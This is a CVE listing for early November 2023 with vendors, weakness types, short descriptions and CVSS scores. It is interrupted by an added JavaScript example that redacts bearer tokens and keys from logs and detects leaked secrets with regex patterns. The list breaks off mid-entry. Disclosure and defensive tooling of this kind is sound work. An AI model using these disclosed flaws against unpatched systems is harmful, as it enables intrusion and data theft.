2023-11-07 CVE-2023-42528 Samsung Out-of-bounds Write vulnerability in Samsung Android 11.0/12.0

Improper Input Validation vulnerability in ProcessNvBuffering of libsec-ril prior to SMR Nov-2023 Release 1 allows a local attacker to execute arbitrary code.

7.8
2023-11-07 CVE-2023-42529 Samsung Out-of-bounds Write vulnerability in Samsung Android 11.0/12.0

Out-of-bound write vulnerability in libsec-ril prior to SMR Nov-2023 Release 1 allows local attackers to execute arbitrary code.

7.8
2023-11-07 CVE-2023-42535 Samsung Out-of-bounds Write vulnerability in Samsung Android 12.0/13.0

Out-of-bounds Write in read_block of vold prior to SMR Nov-2023 Release 1 allows a local attacker to execute arbitrary code.

7.8
2023-11-07 CVE-2023-42536 Samsung Out-of-bounds Write vulnerability in Samsung Android 11.0/12.0

An improper input validation in saped_dec in libsaped prior to SMR Nov-2023 Release 1 allows local attackers to cause out-of-bounds read and write.

7.8
2023-11-07 CVE-2023-42537 Samsung Out-of-bounds Write vulnerability in Samsung Android 11.0/12.0

An improper input validation in get_head_crc in libsaped prior to SMR Nov-2023 Release 1 allows local attackers to cause out-of-bounds read and write.

7.8
2023-11-07 CVE-2023-42538 Samsung Out-of-bounds Write vulnerability in Samsung Android 11.0/12.0

An improper input validation in saped_rec_silence in libsaped prior to SMR Nov-2023 Release 1 allows local attackers to cause out-of-bounds read and write.

7.8
2023-11-07 CVE-2023-21671 Qualcomm Unspecified vulnerability in Qualcomm products

Memory Corruption in Core during syscall for Sectools Fuse comparison feature.

7.8
2023-11-07 CVE-2023-24852 Qualcomm Out-of-bounds Write vulnerability in Qualcomm products

Memory Corruption in Core due to secure memory access by user while loading modem image.

7.8
2023-11-07 CVE-2023-28545 Qualcomm Out-of-bounds Write vulnerability in Qualcomm products

Memory corruption in TZ Secure OS while loading an app ELF.

7.8
2023-11-07 CVE-2023-28556 Qualcomm Unspecified vulnerability in Qualcomm products

Cryptographic issue in HLOS during key management.

7.8
2023-11-07 CVE-2023-28570 Qualcomm Out-of-bounds Write vulnerability in Qualcomm products

Memory corruption while processing audio effects.

7.8
2023-11-07 CVE-2023-28574 Qualcomm Out-of-bounds Write vulnerability in Qualcomm products

Memory corruption in core services when Diag handler receives a command to configure event listeners.

7.8
2023-11-07 CVE-2023-33031 Qualcomm Out-of-bounds Write vulnerability in Qualcomm products

Memory corruption in Automotive Audio while copying data from ADSP shared buffer to the VOC packet data buffer.

7.8
2023-11-07 CVE-2023-33055 Qualcomm Out-of-bounds Write vulnerability in Qualcomm products

Memory Corruption in Audio while invoking callback function in driver from ADSP.

7.8
2023-11-07 CVE-2023-33059 Qualcomm Out-of-bounds Write vulnerability in Qualcomm products

Memory corruption in Audio while processing the VOC packet data from ADSP.

7.8
2023-11-07 CVE-2023-33074 Qualcomm Out-of-bounds Write vulnerability in Qualcomm products

Memory corruption in Audio when SSR event is triggered after music playback is stopped.

7.8
2023-11-07 CVE-2023-41036 Macvim Improper Privilege Management vulnerability in Macvim

Macvim is a text editor for MacOS.

7.8
2023-11-06 CVE-2023-32837 Google Out-of-bounds Write vulnerability in Google Android 12.0

In video, there is a possible out of bounds write due to a missing bounds check.

7.8
2023-11-06 CVE-2023-3399 Gitlab Unspecified vulnerability in Gitlab

An issue has been discovered in GitLab EE affecting all versions starting from 11.6 before 16.3.6, all versions starting from 16.4 before 16.4.2, all versions starting from 16.5 before 16.5.1.

7.7
2023-11-11 CVE-2023-47390 Juanfont Information Exposure Through Log Files vulnerability in Juanfont Headscale

Headscale through 0.22.3 writes bearer tokens to info-level logs.

7.5
2023-11-11 CVE-2023-46849 Openvpn
Debian
Fedoraproject
Divide By Zero vulnerability in multiple products

Using the --fragment option in certain configuration setups, OpenVPN versions 2.6.0 to 2.6.6 allow an attacker to trigger a divide-by-zero, which could crash the application, leading to a denial of service.

7.5
2023-11-10 CVE-2023-47108 Opentelemetry Allocation of Resources Without Limits or Throttling vulnerability in Opentelemetry

OpenTelemetry-Go Contrib is a collection of third-party packages for OpenTelemetry-Go.

7.5
2023-11-10 CVE-2023-47120 Discourse Allocation of Resources Without Limits or Throttling vulnerability in Discourse 3.1.0/3.1.1/3.2.0

Discourse is an open source platform for community discussion.

7.5
2023-11-10 CVE-2023-6076 Phpgurukul Unspecified vulnerability in PHPgurukul Restaurant Table Booking System 1.0

A vulnerability classified as problematic was found in PHPGurukul Restaurant Table Booking System 1.0.

7.5
2023-11-09 CVE-2018-8863 Philips Unspecified vulnerability in Philips Encoreanywhere

The HTTP header in Philips EncoreAnywhere contains data an attacker may be able to use to gain sensitive information.

7.5
2023-11-09 CVE-2023-4379 Gitlab Unspecified vulnerability in Gitlab

An issue has been discovered in GitLab EE affecting all versions starting from 15.3 prior to 16.2.8, 16.3 prior to 16.3.5, and 16.4 prior to 16.4.1.

7.5
2023-11-09 CVE-2023-5954 Hashicorp Memory Leak vulnerability in Hashicorp Vault

HashiCorp Vault and Vault Enterprise inbound client requests triggering a policy check can lead to an unbounded consumption of memory.

7.5
2023-11-09 CVE-2023-45283 Golang Path Traversal vulnerability in Golang GO

The filepath package does not recognize paths with a \??\ prefix as special.

7.5
2023-11-09 CVE-2023-46894 Espressif Inadequate Encryption Strength vulnerability in Espressif Esptool 4.6.2

An issue discovered in esptool 4.6.2 allows attackers to view sensitive information via weak cryptographic algorithm.

7.5
2023-11-09 CVE-2023-26156 Chromedriver Project OS Command Injection vulnerability in Chromedriver Project Chromedriver

Versions of the package chromedriver before 119.0.1 are vulnerable to Command Injection when setting the chromedriver.path to an arbitrary system binary.

7.5
2023-11-08 CVE-2023-36667 Couchbase Path Traversal vulnerability in Couchbase Server

Couchbase Server 7.1.4 before 7.1.5 and 7.2.0 before 7.2.1 allows Directory Traversal.

7.5
2023-11-08 CVE-2023-5079 Lenovo Improper Input Validation vulnerability in Lenovo Lecloud

Lenovo LeCloud App improper input validation allows attackers to access arbitrary components and arbitrary file downloads, which could result in information disclosure.

7.5
2023-11-08 CVE-2023-45875 Couchbase Unspecified vulnerability in Couchbase Server 7.2.0

An issue was discovered in Couchbase Server 7.2.0.

7.5
2023-11-08 CVE-2023-35767 Perforce Resource Exhaustion vulnerability in Perforce Helix Core

In Helix Core versions prior to 2023.2, an unauthenticated remote Denial of Service (DoS) via the shutdown function was identified.

7.5
2023-11-08 CVE-2023-45319 Perforce Unspecified vulnerability in Perforce Helix Core

In Helix Core versions prior to 2023.2, an unauthenticated remote Denial of Service (DoS) via the commit function was identified.

7.5
2023-11-08 CVE-2023-5759 Perforce Unspecified vulnerability in Perforce Helix Core

In Helix Core versions prior to 2023.2, an unauthenticated remote Denial of Service (DoS) via the buffer was identified.

7.5
2023-11-08 CVE-2023-46757 Huawei Unspecified vulnerability in Huawei Harmonyos 4.0.0

The remote PIN module has a vulnerability that causes incorrect information storage locations. Successful exploitation of this vulnerability may affect confidentiality.

7.5
2023-11-08 CVE-2023-46758 Huawei Unspecified vulnerability in Huawei Emui and Harmonyos

Permission management vulnerability in the multi-screen interaction module.

7.5
2023-11-08 CVE-2023-46759 Huawei Unspecified vulnerability in Huawei Emui and Harmonyos

Permission control vulnerability in the call module.

7.5
2023-11-08 CVE-2023-46760 Huawei Out-of-bounds Write vulnerability in Huawei Emui and Harmonyos

Out-of-bounds write vulnerability in the kernel driver module.

7.5
2023-11-08 CVE-2023-46761 Huawei Out-of-bounds Write vulnerability in Huawei Emui and Harmonyos

Out-of-bounds write vulnerability in the kernel driver module.

7.5
2023-11-08 CVE-2023-46762 Huawei Out-of-bounds Write vulnerability in Huawei Emui and Harmonyos

Out-of-bounds write vulnerability in the kernel driver module.

7.5
2023-11-08 CVE-2023-46765 Huawei Unspecified vulnerability in Huawei Emui and Harmonyos

Vulnerability of uncaught exceptions in the NFC module.

7.5
2023-11-08 CVE-2023-46766 Huawei Out-of-bounds Write vulnerability in Huawei Emui and Harmonyos

Out-of-bounds write vulnerability in the kernel driver module.

7.5
2023-11-08 CVE-2023-46767 Huawei Out-of-bounds Write vulnerability in Huawei Emui and Harmonyos

Out-of-bounds write vulnerability in the kernel driver module.

7.5
2023-11-08 CVE-2023-46772 Huawei Out-of-bounds Write vulnerability in Huawei Emui 11.0.1

Vulnerability of parameters being out of the value range in the QMI service module.

7.5
2023-11-08 CVE-2023-46774 Huawei Unspecified vulnerability in Huawei Emui and Harmonyos

Vulnerability of uncaught exceptions in the NFC module.

7.5
2023-11-08 CVE-2023-44098 Huawei Missing Encryption of Sensitive Data vulnerability in Huawei Emui and Harmonyos

Vulnerability of missing encryption in the card management module.

7.5
2023-11-08 CVE-2023-46771 Huawei Unspecified vulnerability in Huawei Emui and Harmonyos

Security vulnerability in the face unlock module.

7.5
2023-11-08 CVE-2023-5978 Freebsd Unspecified vulnerability in Freebsd 13.0/13.1/13.2

In versions of FreeBSD 13-RELEASE before 13-RELEASE-p5, under certain circumstances the cap_net libcasper(3) service incorrectly validates that updated constraints are strictly subsets of the active constraints.

7.5
2023-11-08 CVE-2023-41111 Samsung Out-of-bounds Write vulnerability in Samsung products

An issue was discovered in Samsung Mobile Processor, Wearable Processor, Automotive Processor, and Modem (Exynos 9810, 9610, 9820, 980, 850, 1080, 2100, 2200, 1280, 1380, 1330, 9110, W920, Modem 5123, Modem 5300, and Auto T5123).

7.5
2023-11-08 CVE-2023-41112 Samsung Classic Buffer Overflow vulnerability in Samsung products

An issue was discovered in Samsung Mobile Processor, Wearable Processor, Automotive Processor, and Modem (Exynos 9810, 9610, 9820, 980, 850, 1080, 2100, 2200, 1280, 1380, 1330, 9110, W920, Modem 5123, Modem 5300, and Auto T5123).

7.5
2023-11-08 CVE-2023-44115 Huawei Unspecified vulnerability in Huawei Emui and Harmonyos

Vulnerability of improper permission control in the Booster module.

7.5
2023-11-08 CVE-2023-46768 Huawei Use After Free vulnerability in Huawei Emui and Harmonyos

Multi-thread vulnerability in the idmap module.

7.5
2023-11-08 CVE-2023-46769 Huawei Use After Free vulnerability in Huawei Emui and Harmonyos

Use-After-Free (UAF) vulnerability in the dubai module.

7.5
2023-11-08 CVE-2023-46770 Huawei Out-of-bounds Write vulnerability in Huawei Emui and Harmonyos

Out-of-bounds vulnerability in the sensor module.

7.5
2023-11-08 CVE-2023-6001 Yugabyte Missing Authorization vulnerability in Yugabyte Yugabytedb

Prometheus metrics are available without authentication.

7.5
2023-11-07 CVE-2023-43984 Advanced Export Products Orders Cron CSV Excel Project Unspecified vulnerability in Advanced Export products Orders Cron CSV Excel Project Advanced Export products Orders Cron CSV Excel

Insecure permissions in Smart Soft advancedexport before v4.4.7 allow unauthenticated attackers to arbitrarily download user information from the ps_customer table.

7.5
2023-11-07 CVE-2021-43419 Opayweb Unspecified vulnerability in Opayweb Opay 1.5.1.26

An Information Disclosure vulnerability exists in Opay Mobile application 1.5.1.26, and possibly later versions, in the logcat app.

7.5
2023-11-07 CVE-2023-5998 Gpac Out-of-bounds Read vulnerability in Gpac

Out-of-bounds Read in GitHub repository gpac/gpac prior to 2.3.0-DEV.

7.5
2023-11-07 CVE-2023-47360 Videolan Integer Underflow (Wrap or Wraparound) vulnerability in Videolan VLC Media Player

Videolan VLC prior to version 3.0.20 contains an Integer underflow that leads to an incorrect packet length.

7.5
2023-11-07 CVE-2023-0436 Mongodb Information Exposure Through Log Files vulnerability in Mongodb Atlas Kubernetes Operator

The affected versions of MongoDB Atlas Kubernetes Operator may print sensitive information like GCP service account keys and API integration secrets while DEBUG mode logging is enabled.

7.5
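Both the Headscale entry above (bearer tokens written to info-level logs) and this MongoDB Atlas Kubernetes Operator entry (service account keys and API secrets printed in DEBUG mode) are the same failure: a credential reaches the log sink unmodified. The block below is an added example, not code from Headscale, the Atlas operator or MongoDB: it redacts bearer credentials and key/secret values before a line is written and scans an existing log for lines that already leaked. The sample log lines, the key-name list and every function name are this example's own constructions.

```javascript
// Added example (not Headscale or Atlas operator code): scrub credentials
// from log lines before they reach a sink, and scan a log for past leaks.

// Key names whose values are treated as secrets. Assumption of this example;
// extend for the field names your own services log.
const SECRET_KEYS = 'api[_-]?key|access[_-]?token|token|secret|password|private[_-]?key';

// Order matters: quoted JSON/YAML values first (so a multi-line PEM body is
// replaced as one unit), then bare key=value pairs, then RFC 6750 bearer
// credentials ("Authorization: Bearer <token>").
const REDACTIONS = [
  [new RegExp(`("?(?:${SECRET_KEYS})"?\\s*[:=]\\s*)"[^"]*"`, 'gi'), '$1"[REDACTED]"'],
  [new RegExp(`\\b((?:${SECRET_KEYS})\\s*[:=]\\s*)[^\\s,;"'}]+`, 'gi'), '$1[REDACTED]'],
  [/\b(Bearer)\s+[A-Za-z0-9\-._~+\/]+=*/g, '$1 [REDACTED]'],
];

// Apply every redaction rule to one log line and return the scrubbed line.
function redact(line) {
  return REDACTIONS.reduce((acc, [re, repl]) => acc.replace(re, repl), line);
}

// Return the lines that would change under redact(): these are the lines in
// an existing log that already carry a secret and need rotation follow-up.
function scanForLeaks(lines) {
  return lines.filter((l) => redact(l) !== l);
}

// Minimal logger wrapper: every message passes through redact() on the way
// to the sink, so a caller that logs a raw request header cannot leak it.
function makeRedactingLogger(sink = console.log) {
  return {
    info: (msg) => sink(redact(`INF ${msg}`)),
    debug: (msg) => sink(redact(`DBG ${msg}`)),
  };
}

// Constructed sample lines: a control-plane request log carrying a bearer
// token, a debug dump of integration settings, and one clean line.
const SAMPLE_LINES = [
  '2023-11-11T10:00:00Z INF request method=GET path=/api/v1/nodes authorization="Bearer hs_constructed_token_abc123"',
  '2023-11-07T09:15:00Z DBG atlas project settings: {"api_key":"constructed-api-key-9f","private_key":"-----BEGIN PRIVATE KEY-----\\nMIIEvQconstructed\\n-----END PRIVATE KEY-----\\n"}',
  '2023-11-11T10:00:01Z INF node registered name=laptop-01 user=alice',
];

for (const line of SAMPLE_LINES) {
  console.log(redact(line));
}
console.log(`lines with leaked secrets: ${scanForLeaks(SAMPLE_LINES).length}`);

const log = makeRedactingLogger();
log.debug('Authorization: Bearer xyz.123');
```

Redaction at the sink is a safety net, not the fix: the remediation for both entries is to stop passing the credential to the logger at all, and any token that already landed in a log should be rotated, since log retention and shipping pipelines usually copy it further than the original file.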
2023-11-07 CVE-2023-42530 Samsung Unspecified vulnerability in Samsung Android 11.0/12.0

Improper access control vulnerability in SecSettings prior to SMR Nov-2023 Release 1 allows attackers to enable Wi-Fi and Wi-Fi Direct without User Interaction.

7.5
2023-11-07 CVE-2023-42532 Samsung Improper Certificate Validation vulnerability in Samsung Android 11.0/12.0

Improper Certificate Validation in FotaAgent prior to SMR Nov-2023 Release1 allows remote attacker to intercept the network traffic including Firmware information.

7.5
2023-11-07 CVE-2023-42543 Samsung Unspecified vulnerability in Samsung Bixby Voice 3.0.52.14/3.1.12

Improper verification of intent by broadcast receiver vulnerability in Bixby Voice prior to version 3.3.35.12 allows attackers to access arbitrary data with Bixby Voice privilege.

7.5
2023-11-07 CVE-2023-42545 Samsung Unspecified vulnerability in Samsung Phone

Use of implicit intent for sensitive communication vulnerability in Phone prior to versions 12.7.20.12 in Android 11, 13.1.48, 13.5.28 in Android 12, and 14.7.38 in Android 13 allows attackers to access location data.

7.5
2023-11-07 CVE-2023-33047 Qualcomm Out-of-bounds Read vulnerability in Qualcomm products

Transient DoS in WLAN Firmware while parsing no-inherit IES.

7.5
2023-11-07 CVE-2023-33048 Qualcomm Out-of-bounds Read vulnerability in Qualcomm products

Transient DoS in WLAN Firmware while parsing t2lm buffers.

7.5
2023-11-07 CVE-2023-33056 Qualcomm NULL Pointer Dereference vulnerability in Qualcomm products

Transient DoS in WLAN Firmware when firmware receives beacon including T2LM IE.

7.5
2023-11-07 CVE-2023-33061 Qualcomm Out-of-bounds Read vulnerability in Qualcomm products

Transient DoS in WLAN Firmware while parsing WLAN beacon or probe-response frame.

7.5
2023-11-06 CVE-2023-5454 Templately Missing Authorization vulnerability in Templately

The Templately WordPress plugin before 2.2.6 does not properly authorize the `saved-templates/delete` REST API call, allowing unauthenticated users to delete arbitrary posts.

7.5
2023-11-06 CVE-2022-48193 Softing Inadequate Encryption Strength vulnerability in Softing Smartlink Sw-Ht

Weak ciphers in Softing smartLink SW-HT before 1.30 are enabled during secure communication (SSL).

7.5
2023-11-06 CVE-2023-39345 Strapi Improper Authentication vulnerability in Strapi

strapi is an open-source headless CMS.

7.5
2023-11-06 CVE-2023-46728 Squid Cache NULL Pointer Dereference vulnerability in Squid-Cache Squid

Squid is a caching proxy for the Web supporting HTTP, HTTPS, FTP, and more.

7.5
2023-11-06 CVE-2023-41378 Tigera Improper Handling of Exceptional Conditions vulnerability in Tigera Calico Cloud, Calico Enterprise and Calico OS

In certain conditions for Calico Typha (v3.26.2, v3.25.1 and below), and Calico Enterprise Typha (v3.17.1, v3.16.3, v3.15.3 and below), a client TLS handshake can block the Calico Typha server indefinitely, resulting in denial of service.

7.5
2023-11-06 CVE-2021-4430 Ortussolutions Unspecified vulnerability in Ortussolutions Coldbox Elixir 3.1.6

A vulnerability classified as problematic has been found in Ortus Solutions ColdBox Elixir 3.1.6.

7.5
2023-11-06 CVE-2023-38407 Frrouting Unspecified vulnerability in Frrouting

bgpd/bgp_label.c in FRRouting (FRR) before 8.5 attempts to read beyond the end of the stream during labeled unicast parsing.

7.5
2023-11-06 CVE-2023-20702 Mediatek Unspecified vulnerability in Mediatek Nr15, Nr16 and Nr17

In 5G NRLC, there is a possible invalid memory access due to lack of error handling.

7.5
2023-11-10 CVE-2023-36014 Microsoft Unspecified vulnerability in Microsoft Edge Chromium

Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability

7.3
2023-11-08 CVE-2023-47113 Bleachbit Uncontrolled Search Path Element vulnerability in Bleachbit

BleachBit cleans files to free disk space and to maintain privacy.

7.3
2023-11-07 CVE-2023-0898 GE Uncontrolled Search Path Element vulnerability in GE Micom S1 Agile

General Electric MiCOM S1 Agile is vulnerable to an attacker achieving code execution by placing malicious DLL files in the directory of the application.

7.3
2023-11-10 CVE-2023-23367 Qnap OS Command Injection vulnerability in Qnap Qts, Quts Hero and Qutscloud

An OS command injection vulnerability has been reported to affect several QNAP operating system versions.

7.2
2023-11-09 CVE-2023-29975 Pfsense Improper Authentication vulnerability in Pfsense 2.6.0

An issue discovered in Pfsense CE version 2.6.0 allows attackers to change the password of any user without verification.

7.2
2023-11-07 CVE-2023-46253 Squidex IO Path Traversal vulnerability in Squidex.Io Squidex 7.8.2

Squidex is an open source headless CMS and content management hub.

7.2
2023-11-07 CVE-2022-45078 Solwininfotech Improper Neutralization of Formula Elements in a CSV File vulnerability in Solwininfotech User Blocker

Improper Neutralization of Formula Elements in a CSV File vulnerability in Solwin Infotech User Blocker. This issue affects User Blocker: from n/a through 1.5.5.

7.2
2023-11-07 CVE-2023-23678 Wpeka Improper Neutralization of Formula Elements in a CSV File vulnerability in Wpeka WP Cookie Consent

Improper Neutralization of Formula Elements in a CSV File vulnerability in WPEkaClub WP Cookie Consent ( for GDPR, CCPA & ePrivacy ). This issue affects WP Cookie Consent ( for GDPR, CCPA & ePrivacy ): from n/a through 2.2.5.

7.2
2023-11-07 CVE-2023-46845 EC Cube Code Injection vulnerability in Ec-Cube

EC-CUBE 3 series (3.0.0 to 3.0.18-p6) and 4 series (4.0.0 to 4.0.6-p3, 4.1.0 to 4.1.2-p2, and 4.2.0 to 4.2.2) contain an arbitrary code execution vulnerability due to improper settings of the template engine Twig included in the product.

7.2
2023-11-06 CVE-2023-5082 Click5Interactive SQL Injection vulnerability in Click5Interactive Sitemap BY Click5

The History Log by click5 WordPress plugin before 1.0.13 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by admin users when using the Smash Balloon Social Photo Feed plugin alongside it.

7.2
2023-11-06 CVE-2023-45161 1E Unspecified vulnerability in 1E Platform

The 1E-Exchange-URLResponseTime instruction that is part of the Network product pack available on the 1E Exchange does not properly validate the URL parameter, which allows for a specially crafted input to perform arbitrary code execution with SYSTEM permissions.

7.2
2023-11-06 CVE-2023-45163 1E Unspecified vulnerability in 1E Platform 8.1.2/8.4.1/9.0.1

The 1E-Exchange-CommandLinePing instruction that is part of the Network product pack available on the 1E Exchange does not properly validate the input parameter, which allows for a specially crafted input to perform arbitrary code execution with SYSTEM permissions.

7.2
2023-11-06 CVE-2023-5964 1E Unspecified vulnerability in 1E Platform

The 1E-Exchange-DisplayMessage instruction that is part of the End-User Interaction product pack available on the 1E Exchange does not properly validate the Caption or Message parameters, which allows for a specially crafted input to perform arbitrary code execution with SYSTEM permissions.

7.2
2023-11-06 CVE-2023-46821 Dev4Press SQL Injection vulnerability in Dev4Press GD Security Headers

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Milan Petrovic GD Security Headers allows auth.

7.2
2023-11-06 CVE-2023-46823 Avirtum SQL Injection vulnerability in Avirtum Imagelinks

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Avirtum ImageLinks Interactive Image Builder for WordPress allows SQL Injection.This issue affects ImageLinks Interactive Image Builder for WordPress: from n/a through 1.5.4.

7.2
2023-11-10 CVE-2023-36024 Microsoft Unspecified vulnerability in Microsoft Edge Chromium

Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability

7.1
2023-11-09 CVE-2023-47613 Telit Path Traversal vulnerability in Telit products

A CWE-23: Relative Path Traversal vulnerability exists in Telit Cinterion BGS5, Telit Cinterion EHS5/6/8, Telit Cinterion PDS5/6/8, Telit Cinterion ELS61/81, Telit Cinterion PLS62 that could allow a local, low privileged attacker to escape from virtual directories and get read/write access to protected files on the targeted system.

7.1
2023-11-07 CVE-2023-42531 Samsung Improper Authentication vulnerability in Samsung Android 11.0/12.0

Improper access control vulnerability in SmsController prior to SMR Nov-2023 Release1 allows local attackers to bypass restrictions on starting activities from the background.

7.1
2023-11-07 CVE-2023-43886 Tenda Out-of-bounds Write vulnerability in Tenda RX9 PRO Firmware 22.03.02.10

A buffer overflow in the HTTP server component of Tenda RX9 Pro v22.03.02.20 might allow an authenticated attacker to overwrite memory.

7.1
2023-11-08 CVE-2023-5760 Avast Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in Avast AVG Antivirus 23.8

A time-of-check to time-of-use (TOCTOU) bug in handling of IOCTL (input/output control) requests.

7.0
2023-11-06 CVE-2023-32832 Google Out-of-bounds Write vulnerability in Google Android 12.0/13.0

In video, there is a possible memory corruption due to a race condition.

7.0

238 Medium Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2023-11-07 CVE-2023-42533 Samsung Unspecified vulnerability in Samsung Android 12.0/13.0

Improper Input Validation with USB Gadget Interface prior to SMR Nov-2023 Release 1 allows a physical attacker to execute arbitrary code in Kernel.

6.8
2023-11-07 CVE-2023-42554 Samsung Improper Authentication vulnerability in Samsung Pass 4.0.05.1/4.2.03.1

Improper Authentication vulnerability in Samsung Pass prior to version 4.3.00.17 allows physical attackers to bypass authentication.

6.8
2023-11-10 CVE-2023-4949 GNU
XEN
Out-of-bounds Write vulnerability in multiple products

An attacker with local access to a system (either through a disk or external drive) can present a modified XFS partition to grub-legacy in such a way to exploit a memory corruption in grub’s XFS file system implementation.

6.7
2023-11-09 CVE-2023-41138 Appsanywhere Unspecified vulnerability in Appsanywhere Client

The AppsAnywhere macOS client-privileged helper can be tricked into executing arbitrary commands with elevated permissions by a local user process.

6.7
2023-11-08 CVE-2023-43571 Lenovo Classic Buffer Overflow vulnerability in Lenovo products

A buffer overflow was reported in the BiosExtensionLoader module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code.

6.7
2023-11-08 CVE-2023-43573 Lenovo Classic Buffer Overflow vulnerability in Lenovo products

A buffer overflow was reported in the LEMALLDriversConnectedEventHook module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code.

6.7
2023-11-08 CVE-2023-43575 Lenovo Classic Buffer Overflow vulnerability in Lenovo products

A buffer overflow was reported in the UltraFunctionTable module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code.

6.7
2023-11-08 CVE-2023-43576 Lenovo Classic Buffer Overflow vulnerability in Lenovo products

A buffer overflow was reported in the WMISwSmi module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code.

6.7
2023-11-08 CVE-2023-43577 Lenovo Classic Buffer Overflow vulnerability in Lenovo products

A buffer overflow was reported in the ReFlash module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code.

6.7
2023-11-08 CVE-2023-43578 Lenovo Classic Buffer Overflow vulnerability in Lenovo products

A buffer overflow was reported in the SmiFlash module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code.

6.7
2023-11-08 CVE-2023-43579 Lenovo Classic Buffer Overflow vulnerability in Lenovo products

A buffer overflow was reported in the SmuV11Dxe driver in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code.

6.7
2023-11-08 CVE-2023-43580 Lenovo Classic Buffer Overflow vulnerability in Lenovo products

A buffer overflow was reported in the SmuV11DxeVMR module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code.

6.7
2023-11-08 CVE-2023-43581 Lenovo Classic Buffer Overflow vulnerability in Lenovo products

A buffer overflow was reported in the Update_WMI module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code.

6.7
2023-11-08 CVE-2023-45075 Lenovo Out-of-bounds Read vulnerability in Lenovo products

A memory leakage vulnerability was reported in the SWSMI_Shadow DXE driver that may allow a local attacker with elevated privileges to write to NVRAM variables.

6.7
2023-11-08 CVE-2023-45076 Lenovo Out-of-bounds Read vulnerability in Lenovo products

A memory leakage vulnerability was reported in the 534D0140 DXE driver that may allow a local attacker with elevated privileges to write to NVRAM variables.

6.7
2023-11-08 CVE-2023-45077 Lenovo Out-of-bounds Read vulnerability in Lenovo products

A memory leakage vulnerability was reported in the 534D0740 DXE driver that may allow a local attacker with elevated privileges to write to NVRAM variables.

6.7
2023-11-08 CVE-2023-45078 Lenovo Out-of-bounds Read vulnerability in Lenovo products

A memory leakage vulnerability was reported in the DustFilterAlertSmm SMM driver that may allow a local attacker with elevated privileges to write to NVRAM variables.

6.7
2023-11-08 CVE-2023-45079 Lenovo Out-of-bounds Read vulnerability in Lenovo products

A memory leakage vulnerability was reported in the NvmramSmm SMM driver that may allow a local attacker with elevated privileges to write to NVRAM variables.

6.7
2023-11-08 CVE-2023-43567 Lenovo Classic Buffer Overflow vulnerability in Lenovo products

A buffer overflow was reported in the LemSecureBootForceKey module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code.

6.7
2023-11-08 CVE-2023-43569 Lenovo Classic Buffer Overflow vulnerability in Lenovo products

A buffer overflow was reported in the OemSmi module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code.

6.7
2023-11-08 CVE-2023-43570 Lenovo Improper Input Validation vulnerability in Lenovo products

A potential vulnerability was reported in the SMI callback function of the OemSmi driver that may allow a local attacker with elevated permissions to execute arbitrary code.

6.7
2023-11-08 CVE-2023-5075 Lenovo Classic Buffer Overflow vulnerability in Lenovo Ideapad Duet 3 10Igl5 Firmware Eqcn37Ww

A buffer overflow was reported in the FmpSipoCapsuleDriver driver in the IdeaPad Duet 3-10IGL5 that may allow a local attacker with elevated privileges to execute arbitrary code.

6.7
2023-11-08 CVE-2023-5078 Lenovo Improper Initialization vulnerability in Lenovo products

A vulnerability was reported in some ThinkPad BIOS that could allow a physical or local attacker with elevated privileges to tamper with BIOS firmware.

6.7
2023-11-08 CVE-2023-0392 Okta Unquoted Search Path or Element vulnerability in Okta Ldap Agent

The LDAP Agent Update service with versions prior to 5.18 used an unquoted path, which could allow arbitrary code execution.

6.7
2023-11-08 CVE-2023-3282 Paloaltonetworks Incorrect Permission Assignment for Critical Resource vulnerability in Paloaltonetworks Cortex Xsoar

A local privilege escalation (PE) vulnerability in the Palo Alto Networks Cortex XSOAR engine software running on a Linux operating system enables a local attacker to execute programs with elevated privileges if the attacker has shell access to the engine.

6.7
2023-11-06 CVE-2023-32818 Google Type Confusion vulnerability in Google Android 11.0/12.0/13.0

In vdec, there is a possible out of bounds write due to type confusion.

6.7
2023-11-06 CVE-2023-32834 Google Type Confusion vulnerability in Google Android 11.0/12.0/13.0

In secmem, there is a possible memory corruption due to type confusion.

6.7
2023-11-06 CVE-2023-32835 Google Type Confusion vulnerability in Google Android 11.0/12.0/13.0

In keyinstall, there is a possible memory corruption due to type confusion.

6.7
2023-11-06 CVE-2023-32836 Google Out-of-bounds Write vulnerability in Google Android 11.0/12.0/13.0

In display, there is a possible out of bounds write due to an integer overflow.

6.7
2023-11-06 CVE-2023-32838 Google Out-of-bounds Write vulnerability in Google Android 11.0/12.0

In dpe, there is a possible out of bounds write due to a missing valid range checking.

6.7
2023-11-06 CVE-2023-32839 Google Out-of-bounds Write vulnerability in Google Android 11.0/12.0

In dpe, there is a possible out of bounds write due to a missing valid range checking.

6.7
2023-11-06 CVE-2023-40660 Opensc Project
Redhat
Improper Authentication vulnerability in multiple products

A flaw was found in OpenSC packages that allow a potential PIN bypass.

6.6
2023-11-12 CVE-2023-42781 Apache Unspecified vulnerability in Apache Airflow

Apache Airflow, versions before 2.7.3, has a vulnerability that allows an authorized user who has access to read specific DAGs only, to read information about task instances in other DAGs. This is a different issue than CVE-2023-42663 but leading to similar outcome. Users of Apache Airflow are advised to upgrade to version 2.7.3 or newer to mitigate the risk associated with this vulnerability.

6.5
2023-11-10 CVE-2023-46733 Sensiolabs Session Fixation vulnerability in Sensiolabs Symfony

Symfony is a PHP framework for web and console applications and a set of reusable PHP components.

6.5
2023-11-09 CVE-2023-45884 Nasa Cross-Site Request Forgery (CSRF) vulnerability in Nasa Openmct

